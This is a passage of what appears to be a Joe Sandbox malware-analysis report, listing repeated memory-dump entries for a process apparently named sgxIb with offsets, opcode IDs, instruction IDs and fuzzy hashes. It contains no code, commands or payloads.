                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a7916670a62337acd168f5ecf9fb19ca70c1f73e69dafda58a829cd66acba78e
                                                                                                                    • Instruction ID: 2b09661955b48d67b9dee6a039ad1472fb5c3b3fa565d99c9a64d28c75ecf07c
                                                                                                                    • Opcode Fuzzy Hash: a7916670a62337acd168f5ecf9fb19ca70c1f73e69dafda58a829cd66acba78e
                                                                                                                    • Instruction Fuzzy Hash: E551C5B0B203159BEF649A6CD89876F269AD78D315F20442BE50FCB3D5CE6DCC825392
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e4e24feb686e2288e9ab57144ee7f1d90fcb1c20d7dcc40ced280c43a1d0a922
                                                                                                                    • Instruction ID: b57d9afa0529823cb89ca5e436fdfc46f49c4ca0bb09ad72649b57c15ac2b7e7
                                                                                                                    • Opcode Fuzzy Hash: e4e24feb686e2288e9ab57144ee7f1d90fcb1c20d7dcc40ced280c43a1d0a922
                                                                                                                    • Instruction Fuzzy Hash: 7051AF31B003198FCB54EB79E48499DB7F6FB89354B208929E409EB345DB31ED42CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 256d82f40aca334a8d91753f919a8ea9c0f5d5d5129394429030ff1c82165cda
                                                                                                                    • Instruction ID: 72193bf9a2ee0aaadf9aeedaf543c3951ba04d54386a6f383b32790d58865b05
                                                                                                                    • Opcode Fuzzy Hash: 256d82f40aca334a8d91753f919a8ea9c0f5d5d5129394429030ff1c82165cda
                                                                                                                    • Instruction Fuzzy Hash: BC413871E107098FDF60CFA9D880AAFFBB6FB84314F10492AE156D7640D731E8468B91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3026849187.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_75b0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 39b5b03f7ec1559d1ed0605107d49e1c802a0c92091d1ae5b32e9e0fff6fd1d7
                                                                                                                    • Instruction ID: 06b29b7895a999790fd58aad1f915dc47140dfc2e0e91f895f366af09a0d6b6d
                                                                                                                    • Opcode Fuzzy Hash: 39b5b03f7ec1559d1ed0605107d49e1c802a0c92091d1ae5b32e9e0fff6fd1d7
                                                                                                                    • Instruction Fuzzy Hash: CB4160B1A007099BDB14DFA5C8546EDFBB1FF88300F14C65AD409BB264EB71A981CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8cefd5a0a3056d7c328bdf73743497fe0476e57890d69ae7c958c1d53b918036
                                                                                                                    • Instruction ID: b22942d0ae838d3bd1c42f4343bc3d46ae02044dc7829baeab8fcf8c2a5025ac
                                                                                                                    • Opcode Fuzzy Hash: 8cefd5a0a3056d7c328bdf73743497fe0476e57890d69ae7c958c1d53b918036
                                                                                                                    • Instruction Fuzzy Hash: 4B31C671E1031A9FCF25DF69D88469EBBF2FF44308F108929E409AB244EB70A8478B40
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a3d8db83370e2a9860548f69843ee0002abe7ac82565db56af6b2565f06a850e
                                                                                                                    • Instruction ID: 0c01c5a716bc890a530bbd77c6c62e169ddacb171815889ba00733515c5f6bb1
                                                                                                                    • Opcode Fuzzy Hash: a3d8db83370e2a9860548f69843ee0002abe7ac82565db56af6b2565f06a850e
                                                                                                                    • Instruction Fuzzy Hash: 2E318B35E106069FCF15CFA4D89469EB7B2FF89304F108529EA06EB384EB71A946CB51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9c569ce0dc94405d4b3375f98c862fabfefe90db9811fd59190e018ac56a9c2a
                                                                                                                    • Instruction ID: fdd1f6a6ce6afecb65304d4c4a2ca0d09fb13b822331f0ad05764da0c9879567
                                                                                                                    • Opcode Fuzzy Hash: 9c569ce0dc94405d4b3375f98c862fabfefe90db9811fd59190e018ac56a9c2a
                                                                                                                    • Instruction Fuzzy Hash: 4C314D34E1060A9FCF59CFA5D89469EB7B2BF89304F10C529EA06EB340DB71AD46CB50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3026849187.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_75b0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7f43e57a39f8eeeacc9385cccceb726537ad8ffd44860242eebbbd54060ffc95
                                                                                                                    • Instruction ID: 1b4764c304b46f6f12dd93c8a2c5de7fe1030c53412eaa222a5ccd81c3d79829
                                                                                                                    • Opcode Fuzzy Hash: 7f43e57a39f8eeeacc9385cccceb726537ad8ffd44860242eebbbd54060ffc95
                                                                                                                    • Instruction Fuzzy Hash: CE313CF0A01A0A9FD764DF6AC494ABAFBF5FF88710B14C969D41997610EB30EC41CB90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c05a45e6338a4692237b6bc895a55f85e136bd86d74cf5da7b761e23f3cf4ee2
                                                                                                                    • Instruction ID: 148810dd5c58691a8d500baeda72913e85ca13805282073feb18ec61af03ba63
                                                                                                                    • Opcode Fuzzy Hash: c05a45e6338a4692237b6bc895a55f85e136bd86d74cf5da7b761e23f3cf4ee2
                                                                                                                    • Instruction Fuzzy Hash: 41216B75E002159FDB50CF69D941AEEBBF9EB88310F108025E905EB380EB35D9028B92
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3026849187.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_75b0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 52b4bd04f4287bfac1463dbbafdab536acdd8a323a4b34da8e84bde765341a6b
                                                                                                                    • Instruction ID: 0f2d94d08a28d69be3be1a618d244603e77f9e39dcfa07c8df4d1932ed762d44
                                                                                                                    • Opcode Fuzzy Hash: 52b4bd04f4287bfac1463dbbafdab536acdd8a323a4b34da8e84bde765341a6b
                                                                                                                    • Instruction Fuzzy Hash: 5E316FB0A01A069FD764CF2AC494AEABBF5BF88710B14C569D4099B610E730EC42CB90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3026849187.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_75b0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7d01aa893c87ff42e06ccf589a83ae5da3f6d6666a97a3cb333bca27d7153ee0
                                                                                                                    • Instruction ID: 5e5a3c4e45965621ccdb51614a6d0b90e1d31638d3f88a52abcaf9bc5b362f31
                                                                                                                    • Opcode Fuzzy Hash: 7d01aa893c87ff42e06ccf589a83ae5da3f6d6666a97a3cb333bca27d7153ee0
                                                                                                                    • Instruction Fuzzy Hash: 6C21C7B47102158FCB14DB79E8987BE77AAEB88311F20402DD50AD7350DF39AC42CBA2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8dd0c2a14bd3218de33fc707fbe5cc402df9ee662f765ab9b3885be236c386f1
                                                                                                                    • Instruction ID: 7980bf44e93094db69141706bc4536bcc945c4e9079eb92d2b2ccfa1d5f6a77c
                                                                                                                    • Opcode Fuzzy Hash: 8dd0c2a14bd3218de33fc707fbe5cc402df9ee662f765ab9b3885be236c386f1
                                                                                                                    • Instruction Fuzzy Hash: 0C216B75E002159FDB50CF69D981AEEBBF9FB88754F109025E905E7380EB35ED028B92
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3026849187.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_75b0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b4291d15753029b2dc5b530a519ed41fb74fb7fb590bd80b34fd5fa44829eae0
                                                                                                                    • Instruction ID: c6acc5891e567c44303136378702fe5193bf044f6ae431dbfa318dba08b7a03c
                                                                                                                    • Opcode Fuzzy Hash: b4291d15753029b2dc5b530a519ed41fb74fb7fb590bd80b34fd5fa44829eae0
                                                                                                                    • Instruction Fuzzy Hash: A82195B47102169FCB14DB79E848B7F77AAEB88311F204029E50AD7350DF799C42CBA2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 42e45ba8cf9b4283ce4f5539527e1ab7fe96541d84d6406d5eb8ccb8a1202a0a
                                                                                                                    • Instruction ID: 06f56a0786a0220435d2f5070b60bf5211e6202c6f67b56b6f10b99ebc4ac7bb
                                                                                                                    • Opcode Fuzzy Hash: 42e45ba8cf9b4283ce4f5539527e1ab7fe96541d84d6406d5eb8ccb8a1202a0a
                                                                                                                    • Instruction Fuzzy Hash: 3221F371A043544FCB15DB78C8545CEFBB5AF8A314F0455ABD015EB291EA30D946CBE2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2974627451.00000000017ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 017ED000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_17ed000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1ff4936c54416d4864860625690a2e2db9ff7f9170460def7316434f8172880c
                                                                                                                    • Instruction ID: 8e808ad796da632fb13a6828bd01e5dfde6766a903898b62e3d0ca9e11999a84
                                                                                                                    • Opcode Fuzzy Hash: 1ff4936c54416d4864860625690a2e2db9ff7f9170460def7316434f8172880c
                                                                                                                    • Instruction Fuzzy Hash: 4A21D7B1508244DFDB25DF58D988B26FBE9FB88334F24C569D8090B246C376D406C661
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2974627451.00000000017ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 017ED000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_17ed000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ea729a3de3a504d190e4a16205491faac143fcb1a8ad0481e2a991c1e929ac44
                                                                                                                    • Instruction ID: 899ec6628e258e8596f5fa4152b9fa5cad85b653fbc7a8c22c358eb376841629
                                                                                                                    • Opcode Fuzzy Hash: ea729a3de3a504d190e4a16205491faac143fcb1a8ad0481e2a991c1e929ac44
                                                                                                                    • Instruction Fuzzy Hash: 482103B5604200DFCB25DF58D5C8B25FBE5EB98314F20C5ADDD0A4A252C336E806CA61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2974627451.00000000017ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 017ED000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_17ed000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c8da7f9da53c7a31a2bb5f2b84fc6e0b99e410f3d24fe4291e5a8e906e7551dc
                                                                                                                    • Instruction ID: a509b0a795766ac7d420ca2ad846e95cde7acf7e73c835b9d0170135f57d26cf
                                                                                                                    • Opcode Fuzzy Hash: c8da7f9da53c7a31a2bb5f2b84fc6e0b99e410f3d24fe4291e5a8e906e7551dc
                                                                                                                    • Instruction Fuzzy Hash: 7621D3B5604204DFDB25DF58D9C8B26FFE5EB88314F28C5ADD90A4A292C336D446CA61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 143c0b5124c869a2a232fdbcca3cf988f56f76854372319204f15f769959ae5b
                                                                                                                    • Instruction ID: 793a80db2897291fb7d401f49f225b2bde85e6c864a5729750e4adfa90016098
                                                                                                                    • Opcode Fuzzy Hash: 143c0b5124c869a2a232fdbcca3cf988f56f76854372319204f15f769959ae5b
                                                                                                                    • Instruction Fuzzy Hash: 462150B1D1071E8BDF64CFA9C84469EBBB5FF85344F15892AD809EB240FB709846CB81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3026849187.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_75b0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6d20e267a24b960cc4b948c944757376a1bdc471c99f3e1eb34e1bcffbfdd8e2
                                                                                                                    • Instruction ID: df6fe8ed2cc1dacc35d5cb66ef2bfcdbf11d6d88ccc42968f882b8b6ed42dedb
                                                                                                                    • Opcode Fuzzy Hash: 6d20e267a24b960cc4b948c944757376a1bdc471c99f3e1eb34e1bcffbfdd8e2
                                                                                                                    • Instruction Fuzzy Hash: 1F31CFB0D01218AFDB20DF99C599BDEBBF5BB49310F24841AE409AB290C7B59945CFA1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3026849187.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_75b0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c723e54d746c7d96b4113e47b87ca1cce4bc233bac10547f35a83f233a3edbd6
                                                                                                                    • Instruction ID: 8f37285ce94bfc1e5d07b6814c9fdcb8eab10cfe1fd117f8e456ac936f1a8a31
                                                                                                                    • Opcode Fuzzy Hash: c723e54d746c7d96b4113e47b87ca1cce4bc233bac10547f35a83f233a3edbd6
                                                                                                                    • Instruction Fuzzy Hash: 0A31D2B0C01218DFDB20DF99D999BDEBFF5BB49314F24841AE404AB290C7B59945CFA1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 39744b3f94187b7712b23d6bf114f5463abe666276283f39561908a1fba9e286
                                                                                                                    • Instruction ID: 7b8154eeb9f81e1a1dcf8c9f094b0f61dbfe3bc3ee3cb6dc20b8c469e6136315
                                                                                                                    • Opcode Fuzzy Hash: 39744b3f94187b7712b23d6bf114f5463abe666276283f39561908a1fba9e286
                                                                                                                    • Instruction Fuzzy Hash: AE21B130B102199FDF44DB69E8546AEB7B7EBC8314F249525D809EB340DB30ED428B84
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8c2ce79e3fef6fa986399022d6ece0184a2264834e6eea08002d4997c4b6ae8e
                                                                                                                    • Instruction ID: b78ad30190d485c13d0fd60967a47fc42bdf24a16a503f1a13167b5a22df43e8
                                                                                                                    • Opcode Fuzzy Hash: 8c2ce79e3fef6fa986399022d6ece0184a2264834e6eea08002d4997c4b6ae8e
                                                                                                                    • Instruction Fuzzy Hash: 9E112232F002101FCBA1D6ADE8542AE73E5EBC961CF10987AE00ECB340DE25DE438381
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c70ebbf74f355087bc64b32c14278925184aceb7dc44bf6abe67667ecb67c77c
                                                                                                                    • Instruction ID: c301c57005185aa81fd60ad7542618fc6617a07f8a616b400a1a6ba9d66542f2
                                                                                                                    • Opcode Fuzzy Hash: c70ebbf74f355087bc64b32c14278925184aceb7dc44bf6abe67667ecb67c77c
                                                                                                                    • Instruction Fuzzy Hash: 88118E36B142259FDB549668DC146EF73FAEBD8314F05443AD40AE7380EE749C068BD2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 59cab8b5d31a9dc89dc28db9e498eadf5ce0f17fc09e6d3d0b7a54b090d68380
                                                                                                                    • Instruction ID: 7582b95ba2b97b8f07e0e760cb6abb74c68f8220a65b566bfa56ee79f5b38887
                                                                                                                    • Opcode Fuzzy Hash: 59cab8b5d31a9dc89dc28db9e498eadf5ce0f17fc09e6d3d0b7a54b090d68380
                                                                                                                    • Instruction Fuzzy Hash: C2012431B002901FCB66D67EA81876E77D6CBCA618F14446AE40ECB341DE15DD434396
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c08a63ffca500e21be25d74436c3d3524960ef653265911e09131a8fe8fc0f2e
                                                                                                                    • Instruction ID: 65d3a1cf68cba919c2cd429e26bc431144ffb55a2fff3c37a3c7677ad1912555
                                                                                                                    • Opcode Fuzzy Hash: c08a63ffca500e21be25d74436c3d3524960ef653265911e09131a8fe8fc0f2e
                                                                                                                    • Instruction Fuzzy Hash: 8111A071E003185BCB54DB78C8445DEFBB5AB8A310F1494AAD006EB240EA30DA42CFD2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8c5aca716344629c6c96ea56b26013aedc5b266433ff987a1ffe63af603e0070
                                                                                                                    • Instruction ID: 79c439ad565ac923b22d9ab9e00ce5c969908c51d80565eccbc9c760d6edfccb
                                                                                                                    • Opcode Fuzzy Hash: 8c5aca716344629c6c96ea56b26013aedc5b266433ff987a1ffe63af603e0070
                                                                                                                    • Instruction Fuzzy Hash: BA21F2B5D01319AFCB00DF9AD985ADEFFB4FB08310F10812AE918B7240D374A954CBA5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2974627451.00000000017ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 017ED000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_17ed000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                    • Instruction ID: 8a25fb83df69086a57734dfe000e40f7b4800f0e9759b684aba7eb309c63aedf
                                                                                                                    • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                    • Instruction Fuzzy Hash: 5811BE75504284CFDB22CF54D5C8B15FFB1FB88314F28C6AAD8494B696C33AD44ACB61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2974627451.00000000017ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 017ED000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_17ed000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 118f051af2fa4d3b71157da4c1d703aecab942a5cdb4903c1e78cbe3821e71d1
                                                                                                                    • Instruction ID: 596d0fa3198c29e902aeb3f10a3c40c5e418b38d7fdb6a4165158463aab43cbf
                                                                                                                    • Opcode Fuzzy Hash: 118f051af2fa4d3b71157da4c1d703aecab942a5cdb4903c1e78cbe3821e71d1
                                                                                                                    • Instruction Fuzzy Hash: 5911C475508280CFDB12CF58D5C8B15FFB2FB88324F24C6AAD8494B656C33AD40ACB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2974627451.00000000017ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 017ED000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_17ed000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                    • Instruction ID: dd3fc3f9696aef7042bd96eb0f6dd255b83116a61ecdbdc981833a245fe4554b
                                                                                                                    • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                    • Instruction Fuzzy Hash: AC11BE75504280CFDB12CF54D5C8B15FBA2FB89314F24C6AEDD494B296C33AE44ACB52
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3026849187.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_75b0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bb55e2fee3249462a0464656e86233fe0a20bf0cc8dc5b6a3461dedf8c250627
                                                                                                                    • Instruction ID: a88e2f978a323a25443e5433586b948cac11d99f4e32663d910268aaad2213e0
                                                                                                                    • Opcode Fuzzy Hash: bb55e2fee3249462a0464656e86233fe0a20bf0cc8dc5b6a3461dedf8c250627
                                                                                                                    • Instruction Fuzzy Hash: 911102B4609B059FD3B48B28A4985F67BA6FB56700B04884ED047C7641DB35EC018B80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 88fa213ee415f2179475bcc3dd870565bda6d0c0afe11fcf7091e47ae07b8b8d
                                                                                                                    • Instruction ID: 5af5a81989c614d4ae02915f67213a2c3e0404ee3687c78fd6a428f00d1f1cc4
                                                                                                                    • Opcode Fuzzy Hash: 88fa213ee415f2179475bcc3dd870565bda6d0c0afe11fcf7091e47ae07b8b8d
                                                                                                                    • Instruction Fuzzy Hash: 3111CFB5D01219AFCB10DF9AD884ADEFFB8FB49310F10812AE918A7241C374A954CBA5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6cb63d4efd15cccaac0b758df777629b0a2eb9ea66b926f762fffc119cceac7d
